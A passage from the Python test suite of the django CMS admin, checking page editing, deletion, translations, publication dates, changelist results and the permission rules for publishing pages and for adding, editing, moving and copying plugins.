resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page.pk, page_data,
follow=True)
self.assertEqual(resp.status_code, 200)
self.assertTemplateNotUsed(resp, 'admin/login.html')
resp = self.client.post(base.URL_CMS_PAGE_CHANGE % page.pk, page_data,
follow=True)
self.assertEqual(resp.status_code, 200)
self.assertTemplateNotUsed(resp, 'admin/login.html')
page = Page.objects.get(pk=page.pk)
self.assertEqual(page.get_title(), OLD_PAGE_NAME)
self.assertEqual(page.reverse_id, REVERSE_ID)
self.assertEqual(page.application_urls, '')
def test_2apphooks_with_same_namespace(self):
PAGE1 = 'Test Page'
PAGE2 = 'Test page 2'
APPLICATION_URLS = 'project.sampleapp.urls'
admin_user, normal_guy = self._get_guys()
current_site = Site.objects.get(pk=1)
# The admin creates the page
page = create_page(PAGE1, "nav_playground.html", "en",
site=current_site, created_by=admin_user)
page2 = create_page(PAGE2, "nav_playground.html", "en",
site=current_site, created_by=admin_user)
page.application_urls = APPLICATION_URLS
page.application_namespace = "space1"
page.save()
page2.application_urls = APPLICATION_URLS
page2.save()
# The admin edits the page (change the page name for ex.)
page_data = {
'title': PAGE2,
'slug': page2.get_slug(),
'language': 'en',
'site': page.site.pk,
'template': page2.template,
'application_urls': 'SampleApp',
'application_namespace': 'space1',
}
with self.login_user_context(admin_user):
resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page.pk, page_data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(Page.objects.filter(application_namespace="space1").count(), 1)
resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page2.pk, page_data)
self.assertEqual(resp.status_code, 200)
page_data['application_namespace'] = 'space2'
resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page2.pk, page_data)
self.assertEqual(resp.status_code, 302)
def test_delete(self):
admin_user = self.get_superuser()
create_page("home", "nav_playground.html", "en",
created_by=admin_user, published=True)
page = create_page("delete-page", "nav_playground.html", "en",
created_by=admin_user, published=True)
create_page('child-page', "nav_playground.html", "en",
created_by=admin_user, published=True, parent=page)
body = page.placeholders.get(slot='body')
add_plugin(body, 'TextPlugin', 'en', body='text')
page.publish('en')
with self.login_user_context(admin_user):
data = {'post': 'yes'}
response = self.client.post(URL_CMS_PAGE_DELETE % page.pk, data)
self.assertRedirects(response, URL_CMS_PAGE)
def test_delete_diff_language(self):
admin_user = self.get_superuser()
create_page("home", "nav_playground.html", "en",
created_by=admin_user, published=True)
page = create_page("delete-page", "nav_playground.html", "en",
created_by=admin_user, published=True)
create_page('child-page', "nav_playground.html", "de",
created_by=admin_user, published=True, parent=page)
body = page.placeholders.get(slot='body')
add_plugin(body, 'TextPlugin', 'en', body='text')
page.publish('en')
with self.login_user_context(admin_user):
data = {'post': 'yes'}
response = self.client.post(URL_CMS_PAGE_DELETE % page.pk, data)
self.assertRedirects(response, URL_CMS_PAGE)
def test_search_fields(self):
superuser = self.get_superuser()
from django.contrib.admin import site
with self.login_user_context(superuser):
for model, admin_instance in site._registry.items():
if model._meta.app_label != 'cms':
continue
if not admin_instance.search_fields:
continue
url = admin_reverse('cms_%s_changelist' % model._meta.model_name)
response = self.client.get('%s?q=1' % url)
errmsg = response.content
self.assertEqual(response.status_code, 200, errmsg)
def test_pagetree_filtered(self):
superuser = self.get_superuser()
create_page("root-page", "nav_playground.html", "en",
created_by=superuser, published=True)
with self.login_user_context(superuser):
url = admin_reverse('cms_page_changelist')
response = self.client.get('%s?template__exact=nav_playground.html' % url)
errmsg = response.content
self.assertEqual(response.status_code, 200, errmsg)
def test_delete_translation(self):
admin_user = self.get_superuser()
page = create_page("delete-page-translation", "nav_playground.html", "en",
created_by=admin_user, published=True)
create_title("de", "delete-page-translation-2", page, slug="delete-page-translation-2")
create_title("es-mx", "delete-page-translation-es", page, slug="delete-page-translation-es")
with self.login_user_context(admin_user):
response = self.client.get(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'de'})
self.assertEqual(response.status_code, 200)
response = self.client.post(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'de'})
self.assertRedirects(response, URL_CMS_PAGE)
response = self.client.get(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'es-mx'})
self.assertEqual(response.status_code, 200)
response = self.client.post(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'es-mx'})
self.assertRedirects(response, URL_CMS_PAGE)
def test_change_dates(self):
admin_user, staff = self._get_guys()
with self.settings(USE_TZ=False, TIME_ZONE='UTC'):
page = create_page('test-page', 'nav_playground.html', 'en')
page.publish('en')
draft = page.get_draft_object()
original_date = draft.publication_date
original_end_date = draft.publication_end_date
new_date = timezone.now() - datetime.timedelta(days=1)
new_end_date = timezone.now() + datetime.timedelta(days=1)
url = admin_reverse('cms_page_dates', args=(draft.pk,))
with self.login_user_context(admin_user):
response = self.client.post(url, {
'language': 'en',
'site': draft.site.pk,
'publication_date_0': new_date.date(),
'publication_date_1': new_date.strftime("%H:%M:%S"),
'publication_end_date_0': new_end_date.date(),
'publication_end_date_1': new_end_date.strftime("%H:%M:%S"),
})
self.assertEqual(response.status_code, 302)
draft = Page.objects.get(pk=draft.pk)
self.assertNotEqual(draft.publication_date.timetuple(), original_date.timetuple())
self.assertEqual(draft.publication_date.timetuple(), new_date.timetuple())
self.assertEqual(draft.publication_end_date.timetuple(), new_end_date.timetuple())
if original_end_date:
self.assertNotEqual(draft.publication_end_date.timetuple(), original_end_date.timetuple())
with self.settings(USE_TZ=True, TIME_ZONE='UTC'):
page = create_page('test-page-2', 'nav_playground.html', 'en')
page.publish('en')
draft = page.get_draft_object()
original_date = draft.publication_date
original_end_date = draft.publication_end_date
new_date = timezone.localtime(timezone.now()) - datetime.timedelta(days=1)
new_end_date = timezone.localtime(timezone.now()) + datetime.timedelta(days=1)
url = admin_reverse('cms_page_dates', args=(draft.pk,))
with self.login_user_context(admin_user):
response = self.client.post(url, {
'language': 'en',
'site': draft.site.pk,
'publication_date_0': new_date.date(),
'publication_date_1': new_date.strftime("%H:%M:%S"),
'publication_end_date_0': new_end_date.date(),
'publication_end_date_1': new_end_date.strftime("%H:%M:%S"),
})
self.assertEqual(response.status_code, 302)
draft = Page.objects.get(pk=draft.pk)
self.assertNotEqual(draft.publication_date.timetuple(), original_date.timetuple())
self.assertEqual(timezone.localtime(draft.publication_date).timetuple(), new_date.timetuple())
self.assertEqual(timezone.localtime(draft.publication_end_date).timetuple(), new_end_date.timetuple())
if original_end_date:
self.assertNotEqual(draft.publication_end_date.timetuple(), original_end_date.timetuple())
def test_change_template(self):
admin_user, staff = self._get_guys()
request = self.get_request(URL_CMS_PAGE_CHANGE % 1, 'en')
request.method = "POST"
pageadmin = site._registry[Page]
with self.login_user_context(staff):
self.assertRaises(Http404, pageadmin.change_template, request, 1)
page = create_page('test-page', 'nav_playground.html', 'en')
response = pageadmin.change_template(request, page.pk)
self.assertEqual(response.status_code, 403)
url = admin_reverse('cms_page_change_template', args=(page.pk,))
with self.login_user_context(admin_user):
response = self.client.post(url, {'template': 'doesntexist'})
self.assertEqual(response.status_code, 400)
response = self.client.post(url, {'template': get_cms_setting('TEMPLATES')[0][0]})
self.assertEqual(response.status_code, 200)
def test_get_permissions(self):
page = create_page('test-page', 'nav_playground.html', 'en')
url = admin_reverse('cms_page_get_permissions', args=(page.pk,))
response = self.client.get(url)
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, '/en/admin/login/?next=%s' % (URL_CMS_PAGE_PERMISSIONS % page.pk))
admin_user = self.get_superuser()
with self.login_user_context(admin_user):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateNotUsed(response, 'admin/login.html')
def test_changelist_items(self):
admin_user = self.get_superuser()
first_level_page = create_page('level1', 'nav_playground.html', 'en')
second_level_page_top = create_page('level21', "nav_playground.html", "en",
created_by=admin_user, published=True, parent=first_level_page)
second_level_page_bottom = create_page('level22', "nav_playground.html", "en",
created_by=admin_user, published=True,
parent=self.reload(first_level_page))
third_level_page = create_page('level3', "nav_playground.html", "en",
created_by=admin_user, published=True, parent=second_level_page_top)
self.assertEqual(Page.objects.all().count(), 4)
url = admin_reverse('cms_%s_changelist' % Page._meta.model_name)
request = self.get_request(url)
request.session = {}
request.user = admin_user
page_admin = site._registry[Page]
cl_params = [request, page_admin.model, page_admin.list_display,
page_admin.list_display_links, page_admin.list_filter,
page_admin.date_hierarchy, page_admin.search_fields,
page_admin.list_select_related, page_admin.list_per_page]
if hasattr(page_admin, 'list_max_show_all'): # django 1.4
cl_params.append(page_admin.list_max_show_all)
cl_params.extend([page_admin.list_editable, page_admin])
cl = CMSChangeList(*tuple(cl_params))
cl.set_items(request)
root_page = cl.get_items()[0]
self.assertEqual(root_page, first_level_page)
self.assertEqual(root_page.get_children()[0], second_level_page_top)
self.assertEqual(root_page.get_children()[1], second_level_page_bottom)
self.assertEqual(root_page.get_children()[0].get_children()[0], third_level_page)
def test_changelist_get_results(self):
admin_user = self.get_superuser()
first_level_page = create_page('level1', 'nav_playground.html', 'en', published=True)
second_level_page_top = create_page('level21', "nav_playground.html", "en",
created_by=admin_user, published=True,
parent=first_level_page)
second_level_page_bottom = create_page('level22', "nav_playground.html", "en", # nopyflakes
created_by=admin_user, published=True,
parent=self.reload(first_level_page))
third_level_page = create_page('level3', "nav_playground.html", "en", # nopyflakes
created_by=admin_user, published=True,
parent=second_level_page_top)
fourth_level_page = create_page('level23', "nav_playground.html", "en", # nopyflakes
created_by=admin_user,
parent=self.reload(first_level_page))
self.assertEqual(Page.objects.all().count(), 9)
url = admin_reverse('cms_%s_changelist' % Page._meta.model_name)
request = self.get_request(url)
request.session = {}
request.user = admin_user
page_admin = site._registry[Page]
# full blown page list. only draft pages are taken into account
cl_params = [request, page_admin.model, page_admin.list_display,
page_admin.list_display_links, page_admin.list_filter,
page_admin.date_hierarchy, page_admin.search_fields,
page_admin.list_select_related, page_admin.list_per_page]
if hasattr(page_admin, 'list_max_show_all'): # django 1.4
cl_params.append(page_admin.list_max_show_all)
cl_params.extend([page_admin.list_editable, page_admin])
cl = CMSChangeList(*tuple(cl_params))
cl.get_results(request)
self.assertEqual(cl.full_result_count, 5)
self.assertEqual(cl.result_count, 5)
# only one unpublished page is returned
request = self.get_request(url+'?q=level23')
request.session = {}
request.user = admin_user
cl_params[0] = request
cl = CMSChangeList(*tuple(cl_params))
cl.get_results(request)
self.assertEqual(cl.full_result_count, 5)
self.assertEqual(cl.result_count, 1)
# a number of pages matches the query
request = self.get_request(url+'?q=level2')
request.session = {}
request.user = admin_user
cl_params[0] = request
cl = CMSChangeList(*tuple(cl_params))
cl.get_results(request)
self.assertEqual(cl.full_result_count, 5)
self.assertEqual(cl.result_count, 3)
def test_unihandecode_doesnt_break_404_in_admin(self):
self.get_superuser()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='admin', password='admin')
response = self.client.get(URL_CMS_PAGE_CHANGE_LANGUAGE % (1, 'en'))
self.assertEqual(response.status_code, 404)
def test_empty_placeholder_in_correct_language(self):
"""
Test that Cleaning a placeholder only affect current language contents
"""
# create some objects
page_en = create_page("EmptyPlaceholderTestPage (EN)", "nav_playground.html", "en")
ph = page_en.placeholders.get(slot="body")
# add the text plugin to the en version of the page
add_plugin(ph, "TextPlugin", "en", body="Hello World EN 1")
add_plugin(ph, "TextPlugin", "en", body="Hello World EN 2")
# creating a de title of the page and adding plugins to it
create_title("de", page_en.get_title(), page_en, slug=page_en.get_slug())
add_plugin(ph, "TextPlugin", "de", body="Hello World DE")
add_plugin(ph, "TextPlugin", "de", body="Hello World DE 2")
add_plugin(ph, "TextPlugin", "de", body="Hello World DE 3")
# before cleaning the de placeholder
self.assertEqual(ph.get_plugins('en').count(), 2)
self.assertEqual(ph.get_plugins('de').count(), 3)
admin_user, staff = self._get_guys()
with self.login_user_context(admin_user):
url = '%s?language=de' % admin_reverse('cms_page_clear_placeholder', args=[ph.pk])
response = self.client.post(url, {'test': 0})
self.assertEqual(response.status_code, 302)
# After cleaning the de placeholder, en placeholder must still have all the plugins
self.assertEqual(ph.get_plugins('en').count(), 2)
self.assertEqual(ph.get_plugins('de').count(), 0)
class AdminTests(AdminTestsBase):
# TODO: needs tests for actual permissions, not only superuser/normaluser
def setUp(self):
self.page = create_page("testpage", "nav_playground.html", "en")
def get_admin(self):
User = get_user_model()
fields = dict(email="[email protected]", is_staff=True, is_superuser=True)
if (User.USERNAME_FIELD != 'email'):
fields[User.USERNAME_FIELD] = "admin"
usr = User(**fields)
usr.set_password(getattr(usr, User.USERNAME_FIELD))
usr.save()
return usr
def get_permless(self):
User = get_user_model()
fields = dict(email="[email protected]", is_staff=True)
if (User.USERNAME_FIELD != 'email'):
fields[User.USERNAME_FIELD] = "permless"
usr = User(**fields)
usr.set_password(getattr(usr, User.USERNAME_FIELD))
usr.save()
return usr
def get_page(self):
return self.page
def test_change_publish_unpublish(self):
page = self.get_page()
permless = self.get_permless()
with self.login_user_context(permless):
request = self.get_request()
response = self.admin_class.publish_page(request, page.pk, "en")
self.assertEqual(response.status_code, 405)
page = self.reload(page)
self.assertFalse(page.is_published('en'))
request = self.get_request(post_data={'no': 'data'})
response = self.admin_class.publish_page(request, page.pk, "en")
self.assertEqual(response.status_code, 403)
page = self.reload(page)
self.assertFalse(page.is_published('en'))
admin_user = self.get_admin()
with self.login_user_context(admin_user):
request = self.get_request(post_data={'no': 'data'})
response = self.admin_class.publish_page(request, page.pk, "en")
self.assertEqual(response.status_code, 302)
page = self.reload(page)
self.assertTrue(page.is_published('en'))
response = self.admin_class.unpublish(request, page.pk, "en")
self.assertEqual(response.status_code, 302)
page = self.reload(page)
self.assertFalse(page.is_published('en'))
def test_change_status_adds_log_entry(self):
page = self.get_page()
admin_user = self.get_admin()
with self.login_user_context(admin_user):
request = self.get_request(post_data={'no': 'data'})
self.assertFalse(LogEntry.objects.count())
response = self.admin_class.publish_page(request, page.pk, "en")
self.assertEqual(response.status_code, 302)
self.assertEqual(1, LogEntry.objects.count())
self.assertEqual(page.pk, int(LogEntry.objects.all()[0].object_id))
def test_change_innavigation(self):
page = self.get_page()
permless = self.get_permless()
admin_user = self.get_admin()
with self.login_user_context(permless):
request = self.get_request()
response = self.admin_class.change_innavigation(request, page.pk)
self.assertEqual(response.status_code, 405)
with self.login_user_context(permless):
request = self.get_request(post_data={'no': 'data'})
response = self.admin_class.change_innavigation(request, page.pk)
self.assertEqual(response.status_code, 403)
with self.login_user_context(permless):
request = self.get_request(post_data={'no': 'data'})
self.assertRaises(Http404, self.admin_class.change_innavigation,
request, page.pk + 100)
with self.login_user_context(permless):
request = self.get_request(post_data={'no': 'data'})
response = self.admin_class.change_innavigation(request, page.pk)
self.assertEqual(response.status_code, 403)
with self.login_user_context(admin_user):
request = self.get_request(post_data={'no': 'data'})
old = page.in_navigation
response = self.admin_class.change_innavigation(request, page.pk)
self.assertEqual(response.status_code, 200)
page = self.reload(page)
self.assertEqual(old, not page.in_navigation)
def test_publish_page_requires_perms(self):
permless = self.get_permless()
with self.login_user_context(permless):
request = self.get_request()
request.method = "POST"
response = self.admin_class.publish_page(request, Page.objects.all()[0].pk, "en")
self.assertEqual(response.status_code, 403)
def test_revert_page(self):
self.page.publish('en')
title = self.page.title_set.get(language='en')
title.title = 'new'
title.save()
self.assertEqual(Title.objects.all().count(), 2)
self.assertEqual(Page.objects.all().count(), 2)
with self.login_user_context(self.get_superuser()):
request = self.get_request()
request.method = "POST"
response = self.admin_class.revert_page(request, Page.objects.all()[0].pk, "en")
self.assertEqual(response.status_code, 302)
self.assertEqual(Title.objects.all().count(), 2)
self.assertEqual(Page.objects.all().count(), 2)
new_title = Title.objects.get(pk=title.pk)
self.assertNotEqual(title.title, new_title.title)
self.assertTrue(title.publisher_is_draft)
self.assertTrue(new_title.publisher_is_draft)
def test_revert_page_requires_perms(self):
permless = self.get_permless()
with self.login_user_context(permless):
request = self.get_request()
request.method = "POST"
response = self.admin_class.revert_page(request, Page.objects.all()[0].pk, 'en')
self.assertEqual(response.status_code, 403)
def test_revert_page_redirects(self):
admin_user = self.get_admin()
self.page.publish("en") # Ensure public copy exists before reverting
with self.login_user_context(admin_user):
response = self.client.post(admin_reverse('cms_page_revert_page', args=(self.page.pk, 'en')))
self.assertEqual(response.status_code, 302)
url = response['Location']
self.assertTrue(url.endswith('?%s' % get_cms_setting('CMS_TOOLBAR_URL__EDIT_OFF')))
def test_remove_plugin_requires_post(self):
ph = Placeholder.objects.create(slot='test')
plugin = add_plugin(ph, 'TextPlugin', 'en', body='test')
admin_user = self.get_admin()
with self.login_user_context(admin_user):
request = self.get_request()
response = self.admin_class.delete_plugin(request, plugin.pk)
self.assertEqual(response.status_code, 200)
def test_move_plugin(self):
ph = Placeholder.objects.create(slot='test')
plugin = add_plugin(ph, 'TextPlugin', 'en', body='test')
page = self.get_page()
source, target = list(page.placeholders.all())[:2]
pageplugin = add_plugin(source, 'TextPlugin', 'en', body='test')
plugin_class = pageplugin.get_plugin_class_instance()
with force_language('en'):
action_urls = pageplugin.get_action_urls()
expected = {
'reload': plugin_class.requires_reload(PLUGIN_MOVE_ACTION),
'urls': action_urls,
}
placeholder = Placeholder.objects.all()[0]
permless = self.get_permless()
admin_user = self.get_admin()
with self.login_user_context(permless):
request = self.get_request()
response = self.admin_class.move_plugin(request)
self.assertEqual(response.status_code, 405)
request = self.get_request(post_data={'not_usable': '1'})
self.assertRaises(RuntimeError, self.admin_class.move_plugin, request)
with self.login_user_context(admin_user):
request = self.get_request(post_data={'ids': plugin.pk})
self.assertRaises(RuntimeError, self.admin_class.move_plugin, request)
with self.login_user_context(admin_user):
request = self.get_request(post_data={'plugin_id': pageplugin.pk,
'placeholder_id': 'invalid-placeholder', 'plugin_language': 'en'})
self.assertRaises(RuntimeError, self.admin_class.move_plugin, request)
with self.login_user_context(permless):
request = self.get_request(post_data={'plugin_id': pageplugin.pk,
'placeholder_id': placeholder.pk, 'plugin_parent': '', 'plugin_language': 'en'})
self.assertEqual(self.admin_class.move_plugin(request).status_code, HttpResponseForbidden.status_code)
with self.login_user_context(admin_user):
request = self.get_request(post_data={'plugin_id': pageplugin.pk,
'placeholder_id': placeholder.pk, 'plugin_parent': '', 'plugin_language': 'en'})
response = self.admin_class.move_plugin(request)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content.decode('utf8')), expected)
with self.login_user_context(permless):
request = self.get_request(post_data={'plugin_id': pageplugin.pk,
'placeholder_id': placeholder.id, 'plugin_parent': '', 'plugin_language': 'en'})
self.assertEqual(self.admin_class.move_plugin(request).status_code, HttpResponseForbidden.status_code)
with self.login_user_context(admin_user):
request = self.get_request(post_data={'plugin_id': pageplugin.pk,
'placeholder_id': placeholder.id, 'plugin_parent': '', 'plugin_language': 'en'})
response = self.admin_class.move_plugin(request)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content.decode('utf8')), expected)
def test_move_language(self):
page = self.get_page()
source, target = list(page.placeholders.all())[:2]
col = add_plugin(source, 'MultiColumnPlugin', 'en')
sub_col = add_plugin(source, 'ColumnPlugin', 'en', target=col)
col2 = add_plugin(source, 'MultiColumnPlugin', 'de')
admin_user = self.get_admin()
with self.login_user_context(admin_user):
request = self.get_request(post_data={
'plugin_id': sub_col.pk,
'placeholder_id': source.id,
'plugin_parent': col2.pk,
'plugin_language': 'de'
})
response = self.admin_class.move_plugin(request)
self.assertEqual(response.status_code, 200)
sub_col = CMSPlugin.objects.get(pk=sub_col.pk)
self.assertEqual(sub_col.language, "de")
self.assertEqual(sub_col.parent_id, col2.pk)
def test_preview_page(self):
permless = self.get_permless()
with self.login_user_context(permless):
request = self.get_request()
self.assertRaises(Http404, self.admin_class.preview_page, request, 404, "en")
page = self.get_page()
page.publish("en")
base_url = page.get_absolute_url()
with self.login_user_context(permless):
request = self.get_request('/?public=true')
response = self.admin_class.preview_page(request, page.pk, 'en')
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], '%s?%s&language=en' % (base_url, get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')))
request = self.get_request()
response = self.admin_class.preview_page(request, page.pk, 'en')
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], '%s?%s&language=en' % (base_url, get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')))
current_site = Site.objects.create(domain='django-cms.org', name='django-cms')
page.site = current_site
page.save()
page.publish("en")
self.assertTrue(page.is_home)
response = self.admin_class.preview_page(request, page.pk, 'en')
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'],
'http://django-cms.org%s?%s&language=en' % (base_url, get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')))
def test_too_many_plugins_global(self):
conf = {
'body': {
'limits': {
'global': 1,
},
},
}
admin_user = self.get_admin()
url = admin_reverse('cms_page_add_plugin')
with self.settings(CMS_PERMISSION=False, CMS_PLACEHOLDER_CONF=conf):
page = create_page('somepage', 'nav_playground.html', 'en')
body = page.placeholders.get(slot='body')
add_plugin(body, 'TextPlugin', 'en', body='text')
with self.login_user_context(admin_user):
data = {
'plugin_type': 'TextPlugin',
'placeholder_id': body.pk,
'plugin_language': 'en',
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseBadRequest.status_code)
def test_too_many_plugins_type(self):
conf = {
'body': {
'limits': {
'TextPlugin': 1,
},
},
}
admin_user = self.get_admin()
url = admin_reverse('cms_page_add_plugin')
with self.settings(CMS_PERMISSION=False, CMS_PLACEHOLDER_CONF=conf):
page = create_page('somepage', 'nav_playground.html', 'en')
body = page.placeholders.get(slot='body')
add_plugin(body, 'TextPlugin', 'en', body='text')
with self.login_user_context(admin_user):
data = {
'plugin_type': 'TextPlugin',
'placeholder_id': body.pk,
'plugin_language': 'en',
'plugin_parent': '',
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseBadRequest.status_code)
def test_edit_title_dirty_bit(self):
language = "en"
admin_user = self.get_admin()
page = create_page('A', 'nav_playground.html', language)
page_admin = PageAdmin(Page, None)
page_admin._current_page = page
page.publish("en")
draft_page = page.get_draft_object()
admin_url = reverse("admin:cms_page_edit_title_fields", args=(
draft_page.pk, language
))
post_data = {
'title': "A Title"
}
with self.login_user_context(admin_user):
self.client.post(admin_url, post_data)
draft_page = Page.objects.get(pk=page.pk).get_draft_object()
self.assertTrue(draft_page.is_dirty('en'))
def test_edit_title_languages(self):
language = "en"
admin_user = self.get_admin()
page = create_page('A', 'nav_playground.html', language)
page_admin = PageAdmin(Page, None)
page_admin._current_page = page
page.publish("en")
draft_page = page.get_draft_object()
admin_url = reverse("admin:cms_page_edit_title_fields", args=(
draft_page.pk, language
))
post_data = {
'title': "A Title"
}
with self.login_user_context(admin_user):
self.client.post(admin_url, post_data)
draft_page = Page.objects.get(pk=page.pk).get_draft_object()
self.assertTrue(draft_page.is_dirty('en'))
def test_page_form_leak(self):
language = "en"
admin_user = self.get_admin()
request = self.get_request('/', 'en')
request.user = admin_user
page = create_page('A', 'nav_playground.html', language, menu_title='menu title')
page_admin = PageAdmin(Page, site)
page_admin._current_page = page
edit_form = page_admin.get_form(request, page)
add_form = page_admin.get_form(request, None)
self.assertEqual(edit_form.base_fields['menu_title'].initial, 'menu title')
self.assertEqual(add_form.base_fields['menu_title'].initial, None)
class NoDBAdminTests(CMSTestCase):
@property
def admin_class(self):
return site._registry[Page]
def test_lookup_allowed_site__exact(self):
self.assertTrue(self.admin_class.lookup_allowed('site__exact', '1'))
def test_lookup_allowed_published(self):
self.assertTrue(self.admin_class.lookup_allowed('published', value='1'))
class PluginPermissionTests(AdminTestsBase):
def setUp(self):
self._page = create_page('test page', 'nav_playground.html', 'en')
self._placeholder = self._page.placeholders.all()[0]
def _get_admin(self):
User = get_user_model()
fields = dict(email="[email protected]", is_staff=True, is_active=True)
if (User.USERNAME_FIELD != 'email'):
fields[User.USERNAME_FIELD] = "admin"
admin_user = User(**fields)
admin_user.set_password('admin')
admin_user.save()
return admin_user
def _get_page_admin(self):
return admin.site._registry[Page]
def _give_permission(self, user, model, permission_type, save=True):
codename = '%s_%s' % (permission_type, model._meta.object_name.lower())
user.user_permissions.add(Permission.objects.get(codename=codename))
def _give_page_permission_rights(self, user):
self._give_permission(user, PagePermission, 'add')
self._give_permission(user, PagePermission, 'change')
self._give_permission(user, PagePermission, 'delete')
def _get_change_page_request(self, user, page):
return type('Request', (object,), {
'user': user,
'path': base.URL_CMS_PAGE_CHANGE % page.pk
})
def _give_cms_permissions(self, user, save=True):
for perm_type in ['add', 'change', 'delete']:
for model in [Page, Title]:
self._give_permission(user, model, perm_type, False)
gpp = GlobalPagePermission.objects.create(
user=user,
can_change=True,
can_delete=True,
can_change_advanced_settings=False,
can_publish=True,
can_change_permissions=False,
can_move_page=True,
)
gpp.sites = Site.objects.all()
if save:
user.save()
def _create_plugin(self):
plugin = add_plugin(self._placeholder, 'TextPlugin', 'en')
return plugin
def test_plugin_add_requires_permissions(self):
"""User tries to add a plugin but has no permissions. He can add the plugin after he got the permissions"""
admin = self._get_admin()
self._give_cms_permissions(admin)
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='admin')
else:
self.client.login(username='admin', password='admin')
url = admin_reverse('cms_page_add_plugin')
data = {
'plugin_type': 'TextPlugin',
'placeholder_id': self._placeholder.pk,
'plugin_language': 'en',
'plugin_parent': '',
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
self._give_permission(admin, Text, 'add')
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
def test_plugin_edit_requires_permissions(self):
"""User tries to edit a plugin but has no permissions. He can edit the plugin after he got the permissions"""
plugin = self._create_plugin()
_, normal_guy = self._get_guys()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='test', password='test')
url = admin_reverse('cms_page_edit_plugin', args=[plugin.id])
response = self.client.post(url, dict())
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
# After he got the permissions, he can edit the plugin
self._give_permission(normal_guy, Text, 'change')
response = self.client.post(url, dict())
self.assertEqual(response.status_code, HttpResponse.status_code)
def test_plugin_edit_wrong_url(self):
"""User tries to edit a plugin using a random url. 404 response returned"""
plugin = self._create_plugin()
_, normal_guy = self._get_guys()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='test', password='test')
self._give_permission(normal_guy, Text, 'change')
url = '%s/edit-plugin/%s/' % (admin_reverse('cms_page_edit_plugin', args=[plugin.id]), plugin.id)
response = self.client.post(url, dict())
self.assertEqual(response.status_code, HttpResponseNotFound.status_code)
self.assertTrue("Plugin not found" in force_text(response.content))
def test_plugin_remove_requires_permissions(self):
"""User tries to remove a plugin but has no permissions. He can remove the plugin after he got the permissions"""
plugin = self._create_plugin()
_, normal_guy = self._get_guys()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='test', password='test')
url = admin_reverse('cms_page_delete_plugin', args=[plugin.pk])
data = dict(plugin_id=plugin.id)
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
# After he got the permissions, he can edit the plugin
self._give_permission(normal_guy, Text, 'delete')
response = self.client.post(url, data)
self.assertEqual(response.status_code, 302)
def test_plugin_move_requires_permissions(self):
"""User tries to move a plugin but has no permissions. He can move the plugin after he got the permissions"""
plugin = self._create_plugin()
_, normal_guy = self._get_guys()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='test', password='test')
url = admin_reverse('cms_page_move_plugin')
data = dict(plugin_id=plugin.id,
placeholder_id=self._placeholder.pk,
plugin_parent='',
)
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
# After he got the permissions, he can edit the plugin
self._give_permission(normal_guy, Text, 'change')
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
def test_plugins_copy_requires_permissions(self):
"""User tries to copy plugin but has no permissions. He can copy plugins after he got the permissions"""
plugin = self._create_plugin()
_, normal_guy = self._get_guys()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='test', password='test')
url = admin_reverse('cms_page_copy_plugins')
data = dict(source_plugin_id=plugin.id,
source_placeholder_id=self._placeholder.pk,
source_language='en',
target_language='fr',
target_placeholder_id=self._placeholder.pk,
)
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
# After he got the permissions, he can edit the plugin
self._give_permission(normal_guy, Text, 'add')
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
def test_plugins_copy_placeholder_ref(self):
"""
User copies a placeholder into a clipboard. A PlaceholderReferencePlugin
is created. Afterwards he copies this into a placeholder and the
PlaceholderReferencePlugin unpacks its content. After that he clears
the clipboard.
"""
self.assertEqual(Placeholder.objects.count(), 2)
self._create_plugin()
self._create_plugin()
admin_user = self.get_superuser()
clipboard = Placeholder()
clipboard.save()
self.assertEqual(CMSPlugin.objects.count(), 2)
settings = UserSettings(language="fr", clipboard=clipboard, user=admin_user)
settings.save()
self.assertEqual(Placeholder.objects.count(), 3)
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='admin', password='admin')
url = admin_reverse('cms_page_copy_plugins')
data = dict(source_plugin_id='',
source_placeholder_id=self._placeholder.pk,
source_language='en',
target_language='en',
target_placeholder_id=clipboard.pk,
)
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
